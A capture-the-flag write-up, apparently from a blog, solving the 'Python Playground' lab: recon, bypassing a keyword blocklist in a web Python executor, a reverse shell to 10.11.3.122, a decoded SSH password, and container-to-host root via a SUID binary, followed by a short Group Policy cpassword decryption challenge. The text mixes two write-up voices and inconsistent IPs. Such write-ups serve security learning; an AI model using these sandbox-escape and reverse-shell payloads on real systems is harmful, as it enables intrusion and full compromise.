Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   448.71 ms 10.9.0.1
2   448.82 ms 10.10.79.248

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.00 seconds

This showed that 2 ports, 22 and 80 are open. Moving on to the website hosted on port 80, I found the homepage with title Secure Python Playground.placeholder

The Login and Signup link ended nowhere but a “Go Back” page.

I ran ffuf to find the hidden directories and pages.

kali@kali:~/thm/python$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://10.10.22.8/FUZZ" -e .php,.html,.txt,.zip

 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/  v1.0.2 ________________________________________________  :: Method : GET :: URL : http://10.10.22.8/FUZZ :: Extensions : .php .html .txt .zip :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403 
________________________________________________

admin.html              [Status: 200, Size: 3134, Words: 667, Lines: 118]
login.html              [Status: 200, Size: 549, Words: 152, Lines: 19]
index.html              [Status: 200, Size: 941, Words: 308, Lines: 30]
signup.html             [Status: 200, Size: 549, Words: 152, Lines: 19]

This gave me a page admin.html.The page had a login form and was using client side authentication.placeholderThe source of the page gave a link to the page a user would get redirected after login.The page worked fine without authentication.placeholder

http://10.10.79.248/super-secret-admin-testing-panel.html

Now I can run python code on this page.I tried to import os but that failed and after few attempts I came to know that i can’t use this word “import “.

I tried to read files on the machine and I was able to read shadow and passwd file,although they were not useful.placeholder

But this told me that maybe I am root on the machine the code is being ran on.

I tried to read /root/flag1.txt and got the first flag.

f=open("/root/flag1.txt","r")
print(f.read())

Since I had saw a hash in the javascript employed on the admin.html page. I thought to decrypt it. I reversed all the process and got the password.

def text_to_unicode(string):
    uni=[]
    for char in string:
         a=ord(char)
         a -= 97
         uni.append(str(a))
    return uni     

def unicode_to_text(string):
    out=""
    for char in range(0,len(string),2):
         a = int(string[char])    
         b = int(string[char +1])
         temp = a * 26
         temp += b
         out += chr(temp)
    return out
     
if __name__ == "__main__":
     hash="dxeedxebdwemdwesdxdtdweqdxefdxefdxdudueqduerdvdtdvdu"
     stri1 = text_to_unicode(hash)
     stri2 = unicode_to_text(stri1)
     stri3 = text_to_unicode(stri2)
     password = unicode_to_text(stri3)
     print(password)

Used the password to login as connor user through SSH.

Got the second flag.

Now, I came to know that the website is running in a docker container and I am logged in the Host machine.

Since, the nmap scan already had given the information that the server is Node JS Express framework.I tried to read the index.js from the python code executer page.

f=open("index.js","r")
print(f.read())
#index.js
const path = require('path');
const fs = require('fs');
const { spawn } = require('child_process');

const express = require('express');
const app = express();
const port = 3000;

app.use(express.urlencoded({
    extended: false
}));

app.use(express.static(path.join(__dirname, 'static')));

function isAllowed(code){
    if(typeof code !== 'string'){
        return false;
    }
    if(code.indexOf('import ') >= 0){
        return false;
    }
    if(code.indexOf('eval') >= 0){
        return false;
    }
    if(code.indexOf('.system') >= 0){
        return false;
    }
    if(code.indexOf('exec') >= 0){
        return false;
    }

    return true;
}

function findAndInsert(str, find, insert){
    const i = str.indexOf(find) + find.length;

    return str.slice(0, i) + insert + str.slice(i);
}

function formatOut(code, output){
    const testingPanelHTML = fs.readFileSync('static/super-secret-admin-testing-panel.html');

    const insertedInput = findAndInsert(testingPanelHTML, '<textarea class="form-control mb-3" name="code">', code);
    const insertedOutput = findAndInsert(insertedInput, '<textarea class="form-control mb-3" readonly>', output);

    return insertedOutput;
}

app.post('/super-secret-admin-testing-panel.html', (req, res) => {
    const code = req.body.code;

    if(isAllowed(code)){
        // Execute the code
        const name = `scripts/${Math.floor(Math.random() * 100000000000)}.py`;
        fs.writeFileSync(name, code);

        const python = spawn('python3', [name]);

        let output = '';
        python.stdout.on('data', (data) => {
            output += data.toString();
        })
        python.stderr.on('data', (data) => {
            output += data.toString();
        })
        python.on('close', (exit_code) => {
            fs.unlinkSync(name);

            output += '\nExit code ' + exit_code;

            res.send(formatOut(code, output));
        })
    }else {
        res.send(formatOut(code, 'Security threat detected!'));
    }
})

app.listen(port, () => console.log('Listening!'));

This shows that import, exec, .system, eval cannot be passed in the code.

This post helped to execute those blacklisted commands.

__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('ls -la')

placeholder

I uploaded a python_pty_backconnect.py from python-pty-shells in the form of base64 encoded string.

base64 -w 0 tcp_pty_backconnect.py > hash
##Copied the text in hash file
##and then ran following command to upload the file
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('echo -n IyEvdXNyL2Jpbi9weXRob24yCiIiIgpSZXZlcnNlIENvbm5lY3QgVENQIFBUWSBTaGVsbCAtIHYxLjAKaW5mb2RveCAtIGluc2VjdXJldHkubmV0ICgyMDEzKQoKR2l2ZXMgYSByZXZlcnNlIGNvbm5lY3QgUFRZIG92ZXIgVENQLgoKRm9yIGFuIGV4Y2VsbGVudCBsaXN0ZW5lciB1c2UgdGhlIGZvbGxvd2luZyBzb2NhdCBjb21tYW5kOgpzb2NhdCBmaWxlOmB0dHlgLGVjaG89MCxyYXcgdGNwNC1saXN0ZW46UE9SVAoKT3IgdXNlIHRoZSBpbmNsdWRlZCB0Y3BfcHR5X3NoZWxsX2hhbmRsZXIucHkKIiIiCmltcG9ydCBvcwppbXBvcnQgcHR5CmltcG9ydCBzb2NrZXQKCmxob3N0ID0gIjEwLjExLjMuMTIyIiAjIFhYWDogQ0hBTkdFTUUKbHBvcnQgPSA5ODc2ICMgWFhYOiBDSEFOR0VNRQoKZGVmIG1haW4oKToKICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICBzLmNvbm5lY3QoKGxob3N0LCBscG9ydCkpCiAgICBvcy5kdXAyKHMuZmlsZW5vKCksMCkKICAgIG9zLmR1cDIocy5maWxlbm8oKSwxKQogICAgb3MuZHVwMihzLmZpbGVubygpLDIpCiAgICBvcy5wdXRlbnYoIkhJU1RGSUxFIiwnL2Rldi9udWxsJykKICAgIHB0eS5zcGF3bigiL2Jpbi9iYXNoIikKICAgIHMuY2xvc2UoKQoJCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBtYWluKCkKCg== | base64 -d > run.py')
##This uploaded the file.
##Ran it using 
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('python2 run.py')

Got a reverse shell on the container

C:\Users\jacco>nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.11.3.122] from (UNKNOWN) [10.10.161.162] 42928
root@playgroundweb:~/app# id
id
uid=0(root) gid=0(root) groups=0(root)
root@playgroundweb:~/app#
or we do it with

Alright, we are able to read files of the system! Let's see if we can create a reverse shell, let's use the python shell from the pentestmonkeys

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("11.11.3.122",9876));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Hmmm... Now we get Security threat detected!. It looks like we are being limited in what we can import, if we just enter import os we get the same error. It looks like it might just be checking for text, so let's try another way of importing os with something called Dunder (double under) methodsos = __import__('os') no if we run this we get a nice clean Exit code 0. Looks like we can use this little trick to bypass the "security":
subprocess = __import__('subprocess')
os = __import__('os')
socket = __import__('socket')

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.3.122",9876));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Don't forget to setup the nc listener on port 9876 and we get a shell! And it looks like a root shell too!
kali@kali:~/thm/python$ cat javadecrypt.py
def text_to_unicode(string):
uni=[]
for char in string:
a=ord(char)
a -= 97
uni.append(str(a))
return uni

def unicode_to_text(string):
out=""
for char in range(0,len(string),2):
a = int(string[char])
b = int(string[char +1])
temp = a * 26
temp += b
out += chr(temp)
return out

if __name__ == "__main__":
hash="dxeedxebdwemdwesdxdtdweqdxefdxefdxdudueqduerdvdtdvdu"
stri1 = text_to_unicode(hash)
stri2 = unicode_to_text(stri1)
stri3 = text_to_unicode(stri2)
password = unicode_to_text(stri3)
print(password)

kali@kali:~/thm/python$ python javadecrypt.py
spaghetti1245

We can now

kali@kali:~/thm/python$ ssh connor@10.10.1.16
connor@10.10.1.16's password:spaghetti1245
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-99-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed Aug 12 12:36:45 UTC 2020

System load: 0.0 Processes: 93
Usage of /: 49.4% of 9.78GB Users logged in: 0
Memory usage: 23% IP address for eth0: 10.10.1.16
Swap usage: 0% IP address for docker0: 172.17.0.1


32 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Aug 12 12:18:42 2020 from 10.11.3.122
connor@pythonplayground:~$

Enumerating through the container, I found some logs at /mnt/log.

Ran Linpeas in the conatiner and found that /dev/xvda2 is mounted at /mnt/log, moreover this xvda2 is not present in container rather it is present in host.placeholder

I thought maybe somehow they are connected and sharing same data.

I visited the directory where the logs are stored in Linux /var/logs and found that this location is directly linked to the /mnt/log in container and if I write something through the container then that file is written with root as owner for both the host and the container.

Changed the permissions of /mnt/log directory to make /var/logs writable by connor,“chmod 777 .”

Thanks again to jammy for making me realize that the /mnt/log in the container was linked to /var/log on the parent machine just like I suspected earlier.
With this in mind we can create a file with suid bit set and execute it afterwards as connor. (This is possible because the root user id is the same across systems)

1
2
3
4
5
6
7
8
9
10
11
// ON THE CONTAINER
# printf 'int main(void){setresuid(0,0,0);system("/bin/sh");}'>tmp.c
# gcc tmp.c -o tmp
# chmod 777 tmp
# chmod +s tmp

// ON THE PARENT MACHINE
connor@pythonplayground:~$ /var/log/tmp
# id
uid=0(root) gid=1000(connor) groups=1000(connor)
# 

Author : Puckiestyle

 

 

rz-challenge51-nl

Spoiler Alert

challenge at https://ringzer0ctf.com/challenges/51

I Lost my password can you find it?

First, download the file and unzip it.
In order to resolve this challenge, you need to decrypt something called “cpassword” that is easy thanks to this:“Microsoft published the AES encryption key used to protect cpassword attributes in Group Policy preference items (CVE-2014-1812 / MS14-025).”
If you use Windows, you can download this program that does not require installation: https://bitbucket.org/grimhacker/gpppfinder/downloads/

Once downloaded you have to find the following file inside the unzipped challenge file: Policies\{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}\User\Preferences\Groups\Groups.xml
Once opened, you will see: cpassword=PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw
This base64 string is broken. You need to add “=” at the end to make it fine.

Once done, execute the program with that base64 password and you will get the following:

gp3finder_v5.0.exe -D PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw=

Group Policy Preference Password Finder (GP3Finder) 5.0.0
Copyright (C) 2020 Oliver Morton
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See GPLv2 License.

INFO: gp3finder: Decrypted password is 10 characters.
INFO: gp3finder: ———-
INFO: gp3finder: LocalRoot!
INFO: gp3finder: ———-

Author : Puckiestyle